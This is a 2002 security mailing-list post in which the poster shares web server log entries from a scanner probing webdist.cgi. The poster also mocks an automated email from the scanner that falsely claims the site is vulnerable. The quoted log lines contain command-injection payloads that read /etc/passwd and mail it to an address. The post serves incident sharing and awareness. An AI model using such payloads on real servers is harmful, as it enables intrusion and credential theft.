Security Incidents mailing list archives
Lame website scanner scanning subnets
From: zeno <bugtraq () cgisecurity net>
Date: Fri, 6 Sep 2002 11:03:47 -0400 (EDT)
I got the following scans in my logs yesterday. 68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-" 68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vuln () threezee com] HTTP/1.0" 404 2656 "-" "-" 68.46.64.23 - - [05/Sep/2002:17:49:22 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 "-" "-" Now I got the following email today.
This is an automated message: This system was scanned by GoogleMaker 1.0, and is found to have a vulnurability. Please contact a system administrator. Vulnurability: Vulnerability in webdist.cgi Information: http://www.cert.org/advisories/CA-1997-12.html URGENT - URGENT - URGENT Thank you, TZSecurity.
What is funny about this is that I do not run this software and they are reporting I do. Seems this persons scanner can't figure out what 404 codes mean. I am reporting this mostly for the fact that if they are reporting false information to me they are probably doing so to others and people should be aware. Visiting the site I see that it is webattack.com editor's pick. Tip for webattack not to pick sites who can't tell the difference between 404 and 200. Regards, - zeno () cgisecurity com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Lame website scanner scanning subnets zeno (Sep 06)